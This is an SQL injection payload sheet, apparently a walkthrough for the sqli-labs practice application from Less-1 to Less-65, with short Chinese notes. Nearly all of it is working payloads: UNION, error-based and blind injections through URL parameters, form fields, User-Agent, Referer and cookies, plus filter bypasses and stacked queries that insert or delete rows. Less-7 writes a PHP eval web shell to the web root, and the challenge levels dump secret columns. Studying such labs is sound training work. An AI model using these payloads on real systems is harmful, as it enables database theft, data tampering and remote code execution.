Less-01
http://ip/Less-1/
?id=-1' union select 1,database(),3 %23
Less-02
http://ip/Less-2/
?id=-1 union select 1,database(),3 %23
?id=-1 union select 1,@@basedir,@@datadir
@@basedir:MySQL 的安装目录(系统变量,不是函数)
@@datadir:MySQL 数据文件所在目录(系统变量,不是函数)
Less-03
http://ip/Less-3/
?id=-1') union select 1,database(),3 %23
Less-04
http://ip/Less-4/
?id=-1") union select 1,database(),3 %23
Less-05
http://ip/Less-5/
?id=1' union select 1,count(*),concat_ws('~',database(),floor(rand()*2)) as a from
information_schema.tables group by a --+
Less-06
http://ip/Less-6/
?id=1" union select 1,count(*),concat_ws('~',database(),floor(rand()*2)) as a from information_schema.tables group by a --+
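Less-07(into outfile 写文件依赖数据库账号的 FILE 权限,且受 secure_file_priv 限制;防御:应用账号不授予 FILE 权限,secure_file_priv 设为 NULL 或与 Web 目录无关的专用目录)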
http://ip/Less-7/
?id=1')) union select 1,2,'<?php @eval($_REQUEST["123"])?>' into outfile
"\\var\\www\\html\\Less-7\\hacker.php" --+
Less-08
http://ip/Less-8/
?id=1' and substr(database(),1,1)='s' --+
http://ip/Less-8/
?id=1' and substr(database(),1,1)>'s' --+
Less-9
http://ip/Less-9/
?id=1' and if((length(database())=8),sleep(3),0) --+
Less-10
http://ip/Less-10/
?id=1" and if((length(database())=8),sleep(3),0) --+
Less-11
http://ip/Less-11/
?id=1
uname=ad' union select user(),database()#&passwd=admin&submit=Submit
Less-12
http://ip/Less-12/
?id=1
uname=ad") union select user(),database()#&passwd=admin&submit=Submit
Less-13
http://ip/Less-13/
uname=ad') and updatexml(1,concat(0x7e,(select user()),0x7e),1)#&passwd=admin&submit=Submit
Less-14
http://ip/Less-14/
uname=admin" and updatexml(1,concat(0x7e,(select user()),0x7e),1)#&passwd=admin&submit=Submit
Less-15
http://ip/Less-15/
uname=' or ascii(substr(@@version,1,1))<64 -- &passwd=&submit=Submit
http://ip/Less-15/
uname=' or ascii(substr(@@version,1,1))>64 -- &passwd=&submit=Submit
Less-16
http://ip/Less-16/
uname=") or ascii(substr(@@version,1,1))<64 -- &passwd=&submit=Submit
http://ip/Less-16/
uname=") or ascii(substr(@@version,1,1))>64 -- &passwd=&submit=Submit
Less-17
http://ip/Less-17/
uname=admin&passwd=chybeta' and updatexml(1,concat(0x7e,(SELECT
database()),0x7e),1)#&submit=Submit
Less-18
User-Agent: ' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or '1
Less-19
Referer: ' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or '
Less-20
Cookie: uname=' union select user(),2,3#
Less-21
编码前(Base64)
') union select user(),2,3#
编码后(Base64)
JykgdW5pb24gc2VsZWN0IHVzZXIoKSwyLDMj
Less-22
#编码前(Base64)
" union select 1,2,user()#
#编码后(Base64)
IiB1bmlvbiBzZWxlY3QgMSwyLHVzZXIoKSM=
Less-23
http://ip/Less-23
?id=' union select 1,database(),'3
Less-24
Less-25
http://ip/Less-25
?id=1'|| extractvalue(1,concat(0x7e,database())) -- +
Less-25a
http://ip/Less-25a
?id=-1 union select 1,database(),3 -- +
Less-26
http://ip/Less-26
?id=-1' || updatexml(1,concat(0x7e,database()),1) || '1'='1
Less-26a
#过滤负号
http://ip/Less-26a
?id=1000')%a0union%a0select%a01,user(),('3
Less-27
http://ip/Less-27
?id=-1000'unIon%a0SelEcT%a01,database(),3||'1
Less-27a
http://ip/Less-27a
?id=0" %a0 UniOn %a0 SelECT %a0 1,2,database();%00
Less-28
http://ip/Less-28
?id=0')union%a0select(1),(user()),(3)||('1
Less-28a
http://ip/Less-28a
?id=0') uNion%a0sElect 1,user(),('3
Less-29
http://ip/Less-29
?id=0&id=-1' uNion%a0sElect 1,user(),'3
Less-30
http://ip/Less-30
?id=0&id=-1" uNion%a0sElect 1,user(),"3
Less-31
http://ip/Less-31
?id=0&id=-1") uNion%a0sElect 1,user(),("3
Less-32
http://ip/Less-32
?id=0&id=-1%df%27 union select 1,user(),3 -- +
Less-33
http://ip/Less-33
?id=0&id=-1%df%27 union select 1,user(),3 -- +
Less-34
http://ip/Less-34
uname=%bb' or 1 limit 1,1#&passwd=1
Less-35
http://ip/Less-35
?id=11 and (extractvalue(1,concat(1,(select database())))) --+
Less-36
http://ip/Less-36
?id=-1%df' union select 1,2,database() --+
Less-37
http://ip/Less-37
uname=-1%df%27 union select 1,database()--+&passwd=1&submit=Submit
Less-38
http://ip/Less-38
?id=1';insert into users values(38,'less38','hello')--+
Less-39
http://ip/Less-39
?id=1;insert into users values(39,'less39','hello')--+
Less-40
http://ip/Less-40
?id=1');insert into users values(40,'Less40','hello')--+
Less-41
http://ip/Less-41
?id=1;insert into users values(41,'Less41','hello')--+
Less-42
';insert into users values(null,'adm','adm');#
Less-43
a');insert into users values(null,'adm1','adm1')#
Less-44
a';insert into users values(null,'adm2','adm2')#
Less-45
a');insert into users values(null,'adm3','adm3')#
Less-46
http://ip/Less-46
?sort=1 and updatexml(1,concat(0x7e,(database()),0x7e),1)--+
Less-47
http://ip/Less-47/
?sort=1' and extractvalue(1,concat(0x7e,database(),0x7e)) --+
Less-48
http://ip/Less-48/
?sort=1 and if((ascii(substr(database(),1,1))=115),sleep(0.5),1) --+
Less-49
http://ip/Less-49/
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(0.5),1)--+
Less-50 (后端使用 mysqli_multi_query(),分号后的语句才会被执行;改用 mysqli_query() 或预处理语句时多语句会被拒绝)
http://ip/Less-50/
?sort=1 desc;insert into users values(null,'test','test');--+
Less-51
http://ip/Less-51/
?sort=1' ;delete from users where id=19;
Less-52
http://ip/Less-52/
?sort=1 desc;delete from users where id=18;
Less-53(无回显)
http://ip/Less-52/
?sort=1 desc'
http://ip/Less-52/
?sort=1 desc'; insert into users values(null,'test1','test1');
Less-53(无回显)
http://ip/Less-53/
?sort=1';
http://ip/Less-53/
?sort=1';delete from users where id=24;
Challenge
Less-54
http://ip/Less-54/
?id=-1' union select 1,database(),3 --+
http://ip/Less-54/
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
http://ip/Less-54/
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="HIURO68RLB"),3 --+
http://ip/Less-54/
?id=-1' union select 1,(select group_concat(secret_B1JE) from HIURO68RLB),3 --+
Less-55
http://ip/Less-55/
?id=-1) union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
http://ip/Less-55/
?id=-1) union select 1,(select group_concat(column_name) from information_schema.columns where table_name="B7966YL9EE"),3 --+
http://ip/Less-55/
?id=-1) union select 1,(select group_concat(secret_IYLU) from B7966YL9EE),3 --+
Less-56
http://ip/Less-56/
?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
http://ip/Less-56/
?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name="IAMTKU9YP5"),3 --+
http://ip/Less-56/
?id=-1') union select 1,(select group_concat(secret_EX3R) from IAMTKU9YP5),3 --+
Less-57
http://ip/Less-57/
?id=-1" union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
http://ip/Less-57/
?id=-1" union select 1,(select group_concat(column_name) from information_schema.columns where table_name="SHHUH6ZE8E"),3 --+
http://ip/Less-57/
?id=-1" union select 1,(select group_concat(secret_BNBI) from SHHUH6ZE8E),3 --+
Less-58
http://ip/Less-58/
?id=1' and extractvalue(1,concat(0x7e,database(),0x7e))--+
http://ip/Less-58/
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema=database()),0x7e))--+
http://ip/Less-58/
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name="3T2NJQ3VYK"),0x7e))--+
http://ip/Less-58/
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(secret_3LQM) from 3T2NJQ3VYK),0x7e))--+
Less-59
http://ip/Less-59/
?id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema=database()),0x7e))--+
http://ip/Less-59/
?id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name="G15HNN62G8"),0x7e))--+
http://ip/Less-59/
?id=1 and extractvalue(1,concat(0x7e,(select group_concat(secret_B2OI) from G15HNN62G8),0x7e))--+
Less-60
http://ip/Less-60/
?id=1") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema=database()),0x7e))--+
http://ip/Less-60/
?id=1") and extractvalue(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name="CPOBEOTIAA"),0x7e))--+
http://ip/Less-60/
?id=1") and extractvalue(1,concat(0x7e,(select group_concat(secret_FD8C) from CPOBEOTIAA),0x7e))--+
Less-61
http://ip/Less-61/
?id=1')) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema=database()),0x7e))--+
http://ip/Less-61/
?id=1')) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name="XJD2PNZS5E"),0x7e))--+
http://ip/Less-61/
?id=1')) and extractvalue(1,concat(0x7e,(select group_concat(secret_ZJU4) from XJD2PNZS5E),0x7e))--+
Less-62
http://ip/Less-62/
?id=1') and ascii(substr(database(),1,1))<115 --+
http://ip/Less-62/
?id=1') and ascii(substr(database(),1,1))>115 --+
Less-63
http://ip/Less-63/
?id=1' and ascii(substr(database(),1,1))<115 --+
http://ip/Less-63/
?id=1' and ascii(substr(database(),1,1))>115 --+
Less-64
http://ip/Less-64/
?id=1)) and ascii(substr(database(),1,1))<115--+
http://ip/Less-64/
?id=1)) and ascii(substr(database(),1,1))>115--+
Less-65
http://ip/Less-65/
?id=1") and ascii(substr(database(),1,1))<115--+
http://ip/Less-65/
?id=1") and ascii(substr(database(),1,1))>115--+